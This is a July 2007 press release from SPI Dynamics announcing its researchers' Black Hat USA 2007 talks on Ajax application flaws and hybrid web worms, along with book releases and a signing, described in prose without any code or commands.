SPI Dynamics Expert Researchers to Demonstrate Hacking Ajax Web Applications and the Latest in Hybrid Web Application Worm Threats at Black Hat USA 2007
Share:
Company's Security Evangelist, Michael Sutton, Will Take Part in Book Signing for the Release of, "Fuzzing: Brute Force Vulnerability Discovery"
ATLANTA, July 23 / -- S.P.I. Dynamics, Inc. (http://www.spidynamics.com/ ), the leading provider of web application security, today announced two of the company's expert researchers will highlight the latest in hacking web applications at the upcoming Black Hat USA 2007 conference at Caesar's Palace in Las Vegas, Nevada, August 1-2. Similar to last year's successful event, this year's Black Hat includes a significant number of talks focused specifically on web application security, underscoring the critical impact aggressively evolving application development technologies such as Ajax are having on today's security industry.
The popularity of Ajax is growing exponentially due to its ability to make web applications much more usable. Unfortunately, far too many people rush into Ajax development without giving proper consideration to the overwhelming possibility of security ramifications that stem from its ability to greatly amplify the same types of common vulnerabilities found in more traditional web applications. Bryan Sullivan, Ajax expert and Senior Security Researcher for SPI Dynamics' SPI Labs research division, will present alongside the Lead SPI Labs Security Researcher and Ajax expert, Billy Hoffman, on Ajax security. The talk titled, "Premature Ajax-ulation" is scheduled during the Black Hat conference on Wednesday, August 1st from 3:15 to 4:30 p.m. PT.
This presentation will demonstrate specific Ajax application design flaws that stem from a disregard for security including improper use of client-side XSLT, use of overly- or underly-granular server-side APIs, and storing secrets (either data or functionality) in client-side code. In addition, this session will demonstrate exploits of these vulnerabilities including: vastly more efficient Blind SQL and Blind XPath injection techniques, detecting and exploiting race conditions, and applying static analysis to deobfuscate client-side JavaScript. The session will also explore when to use and when to avoid the use of Ajax, and how the use of third-party frameworks can actually make matters worse since they hide potential security issues without truly resolving them.
Messrs. Sullivan and Hoffman will also debut a portion of their soon-to- be-released book titled Ajax Security published by Addison-Wesley Professional during Black Hat that will be available to conference attendees in the SPI Dynamics booth (# 9).
Hoffman will co-present another talk at the conference with John Terrill, Executive Vice President and Co-founder of Enterprise Management Technology LLC, focused on the latest in web application hybrid worms. The talk titled, "The Little Hybrid Web Worm that Could" is scheduled for Thursday, August 2nd from 11:15 a.m. to 12:30 p.m. PT. The presentation will discuss the rise in sophisticated web worm attacks over the past year with a look at some of the basic limitations in their methods, including the ability to detect these worms using signatures, making them annoying but ultimately controllable. The presentation will examine the possible evolution of web worms to overcome these limitations, with a description of a hybrid web worm combining both server-side and client side languages to exploit both the web server and the web browser to aid in its propagation across multiple hosts. The presentation will also take a look at how a hybrid web worm could upgrade its infection methods while in the wild by fetching and parsing new web vulnerability information from public security sites, preventing a single silver bullet fix from stopping its propagation, and how web worms could implement polymorphism and source code mutation to evade signature detection systems.
Messrs. Hoffman and Terrill will demo different parts of the worm in isolation to show how its features would function, with a specific look at how the worm could upgrade itself with publicly available vulnerability data, as well as source code mutation. Based on methodology from the JavaScript vulnerability scanner Jikto, Messrs. Hoffman and Terrill will demonstrate DOMinatrix, a JavaScript payload using SQL Injection, to extract information from a web site's database. Finally, the presentation will discuss steps to prevent hybrid web worms from exploiting a web site or its users.
In addition, SPI Dynamics' Security Evangelist, Michael Sutton, will participate in a book signing at Black Hat for the new release of his book titled, Fuzzing: Brute Force Vulnerability Discovery, published by Addison Wesley Professional and co-authored by Pedram Amini and Adam Greene. The signing will take place on Wednesday, August 1st from 3:00 p.m. to 3:15 p.m. PT. For more information on Fuzzing: Brute Force Vulnerability Discovery, please visit www.awprofessional.com/bookstore/product.asp?isbn=0321446119&rl=1 .
For more information on SPI Dynamics, please visit www.spidynamics.com/ .
About S.P.I. Dynamics, Inc.
SPI Dynamics' comprehensive suite of products and services identify and remediate web application and web services security vulnerabilities throughout the application development lifecycle. These award-winning solutions also enable security professionals, QA testers, and developers to work together to verify compliance with 22 security policies such as SOX, HIPAA and PCI. SPI Dynamics has the most application security testing customers worldwide - over 1,000 clients among Global 2000 enterprises, including four out of five of the world's largest banks and nine out of 10 of the largest banks in the U.S., four out of five of the largest software companies, three out of four of the largest aerospace and defense companies, the four largest accounting firms, the five largest telecommunications companies in the U.S., six out of eight of the largest technology hardware and equipment companies, two out of three of the largest healthcare companies, and over 90 U.S. Federal agencies. The Company is one of the fastest growing in the security industry, ranked 83rd on Deloitte's "Fast 500" list of growing technology companies nationwide and 220th on the Inc. 500. SPI Dynamics has strategic partnerships with Microsoft, IBM, HP and Visa. The Company's R&D team, SPI Labs, is widely recognized as one of the leading authorities on web application security and risk management. For more information, visit www.spidynamics.com or call (866) 774-2700.
Source: S.P.I. Dynamics, Inc.
CONTACT:
Michelle Schafer of Merritt Group
+1-703-390-1525
cell: +1-703-403-6377
schafer@merrittgrp.com
or
Ashley Vandiver of SPI Dynamics
+1-678-781-4841
cell: +1-404-432-8657
avandiver@spidynamics.com
Web site: www.spidynamics.com/
http://www.awprofessional.com/bookstore/product.asp?isbn=0321446119&rl=1
